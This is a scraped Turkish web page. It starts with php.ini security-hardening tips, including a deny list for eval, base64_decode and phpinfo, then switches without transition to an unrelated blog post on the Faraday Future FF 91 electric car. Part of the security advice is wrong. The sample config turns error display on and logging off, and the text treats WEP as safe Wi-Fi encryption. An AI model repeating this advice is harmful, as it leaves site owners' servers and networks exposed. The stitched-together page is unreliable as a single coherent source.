“php.ini” web hosting hesabınızdaki dosyalarınızın nasıl bir davranış sergileyeceğini belirlediğimiz bir dosyadır. Bu dosyayı sunucumuzda root dizininde oluşturabilirsiniz. Bu dosyanın özelliklerini düzenleyerek büyük ölçüde güvenlik düzeyinizi arttırabilirsiniz. Özellikle sitenizi uzun süre güncellemeyecekseniz tarayıcı üzerinden dosya yükleme özelliğini kapatarak büyük bir güvenlik önlemini almış olursunuz. İnce ayarlarla bir takım fonksiyonları da devre dışı bırakabilirsiniz. HTTP Apache servisini restart etmeden devreye girmez. Örnek bir php.ini dosyasının içeriği aşağıdadır:

zend_extension=/usr/local/IonCube/ioncube_loader_lin_5.4.so

disable_functions =eval,base64_decode,phpinfo
display_errors = On

log_errors = Off

file_uploads = Off

upload_max_filesize = 128M

max_execution_time = 30

allow_url_fopen=Off

open_basedir = /home/hostingadi:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp

>> Web hosting hesabınıza güvenli bir internet ağı kullanarak bağlanın.

Eğer kablosuz bir internet bağlantısı kullanıyorsanız kablosuz ağınızın WPA veya WEP şifreleme yöntemini kullandığından emin olun.

>> Kişisel bilgisayarınızda güvenliği sağlayın.

İnternet site güvenliğinde en büyük güvenlik açıklarından birisi güvenli olmayan bir bilgisayardan web sitenize erişim sağlamaktır. Virüsler, malware ve keylogger’lar gizli bir şekilde bilgisayarınızda yüklü ve web site dosyalarınıza bulaşarak tehdit oluşturabilirler. En pratik yöntem kişisel bilgisayarınızda düzenli olarak güvenilir bir virüs programıyla tarama yapmaktır.

Üretilen En Hızlı Elektirikli Taşıt

  • 13.1.2017 14:23:14
  • 0 Yorum
  • 420

Meydana getirilen yeni nesil teknolojik modellerle otomotiv dünyasındaki dengeler, değişime uğramaya devam ediyor. Halihazırda yenilikçi tasarım özellikleri ve güç organlarıyla ağzımızı açık bırakmayı başaran etkileyici modeller, birkaç hafta sonunda yerlerini daha yenilikçi başyapıtlara bırakıyorlar. Özellikle de yeni yeni önem kazanan elektrikli otomobiller, değişime uğrayan hatları ve akıl almaz performanslarıyla aklımızı başımızdan alıyorlar.

Yakın gelecekte benzin ve petrol ile çalışan canavarların yerlerini alacak olan elektrikli otomobiller, başlangıçta tatmin edici performanslar sergilememiş olsalar da şimdiler de dünyanın en hızlı otomobilleri arasında yer alan birçok benzinli modeli gölgelemeyi başarıyorlar. Hatta gün geçmeden kendi içlerindeki rekabet daha da alevleniyor ve 643 kilometre menzilli Lucid Air gibi üst düzey elektrikli otomobillerin doğuşuna neden oluyor.

Öyle ki daha birkaç ay önce sizleri şehir içi kullanımı yasal dünyanın en hızlı elektrikli arabası Corvette C7 Genovation GXE modeliyle tanıştırmıştık. Bu gösterişli ve estetik canavar, saatte 331 kilometrelik azami hızıyla aklımızı başımızdan almayı başarmıştı. Daha sonra ise dünyanın en hızlı elektrikli arabası olarak 20.8 kilometrelik Nürburgring pistini 7 dakikada tamamlayan ve 0-100 km/s ivmeye 2.7 saniyede ulaşabilen, 1360 beygirli NIO EP9 modeli karşımıza gelmişti.

Şimdi ise sıra dışı bir model, saatte sıfırdan 100 kilometrelik kalkışıyla, bu elektrikli canavarlara toz yutturmayı başarıyor. 2014 yılından bu yana sektörde varlığını sürdüren ABD merkezli Faraday Future teknoloji şirketinin FF 91 adını verdiği bu elektrikli otomobil, tamamıyla dengeleri altüst edecek gibi görünüyor. Dilerseniz dünyanın en hızlı elektrikli otomobili olarak tanıtılan Faraday Future FF 91 modelinin sahip olduğu etkileyici özelliklere birlikte göz atalım.

Teknolojik Özellikleri ve Modern Görünümüyle Yeryüzüne İnmiş Bir Uzay Aracı
Teknolojik Özellikleri ve Modern Görünümüyle Yeryüzüne İnmiş Bir Uzay Aracı
Aslında elektrikli bir SUV modeli olarak karşımıza gelen FF 91 modeli, teknik ve tasarım özellikleriyle fark yaratmayı başarıyor. Tamamıyla kendine özgü bir tasarım tarzına sahip olan bu model; 5,250 metrelik uzunluğu, 2,283 metrelik genişliği, 1,598 metrelik yüksekliği ve 3,200 metrelik aks mesafesiyle dikkatleri üzerine çekmeyi başarıyor.

Segmentinin en geniş modeli olmayı da başaran Faraday Future FF 91, otonom sürüş sistemiyle de gelecekte ayağımızı yerden kesecek en çılgın ulaşım araçları arasında yer alacak gibi görünüyor. Bünyesinde barındırmış olduğu 13 radar, 12 sensör, 10 adet yüksek çözünürlüklü kamera ve 3D modelleme yapabilen bir adet lidar ile kendi kendini park edebiliyor. Ayrıca dikiz aynalarına yerleştirilen kameralarıyla da oldukça güvenli bir sürüş deneyimi sunuyor.

0-100 Performansıyla Rekorları Altüst Ediyor
0-100 Performansıyla Rekorları Altüst Ediyor
Menzil ve akıl almaz performansıyla “Tesla Katili” olarak adlandırılan FF 91 modeli, dört adet elektrikli motor ile 1050 beygir güç ve 1800 Nm tork üretebiliyor. Aynı zamanda dört çeker özelliğiyle de donatılan bu canavar 0-100 km/s ivmeye sadece 2.39 saniyede ulaşabiliyor. Bu özelliklerin yanı sıra Faraday Future şirketinin LG Chem ile iş birliği yaparak, üretmiş olduğu 130 kWh’lık batarya paketi sayesinde de tek seferlik şarj ile günlük kullanımda 608 km, test sürüşlerinde ise 700 kilometrelik mesafe kat edebiliyor. 240 V’luk güç kaynakları ile yüzde 50’lik şarjı sadece 4,5 saatte tamamlayabilen FF 91, saatte sıfırdan 100 kilometrelik hıza 2.5 saniyede çıkabilen Tesla’nın rekorunu da egale etmeyi başarıyor.

Faraday Future FF 91 Modeli Ne Zaman Satışa Sunulacak?
Faraday Future FF 91 Modeli Ne Zaman Satışa Sunulacak?
Başlangıç olarak 300 adet Faraday Future FF 91 “Alliance Edition” versiyonun üretileceği belirtiliyor.  2018 yılından itibaren potansiyel sahipleriyle buluşması beklenen bu yeni elektrikli canavarın, 5000 dolarlık depozito ile ön satışı gerçekleşecek. Faraday Future FF 91 modelinin fiyatı tam olarak belirlenmemiş olsa da en az 180 bin dolar civarında bir fiyat etiketiyle satışa sunulacağı tahmin ediliyor.


İlginizi Çekebilir:
Jaguar’ın Tamamen Elektrikli İlk SUV Modeli: “I-Pace”
Henüz sektörde 3 yıldır var olmasına rağmen FF 91 modeliyle etkileyici bir giriş yapan Faraday Future, birçok güçlü markayı gölgelemeyi başaracak gibi görünüyor. Sahip olduğu her özellikle rüya gibi bir elektrikli otomobil olan, Faraday Future FF 91, sektördeki dengeleri tamamıyla değiştiriyor. Peki, Faraday Future tarafından meydana getirilen dünyanın en hızlı elektrikli otomobili ile uzun menzilli bir test sürüşü yapmak istemez miydiniz?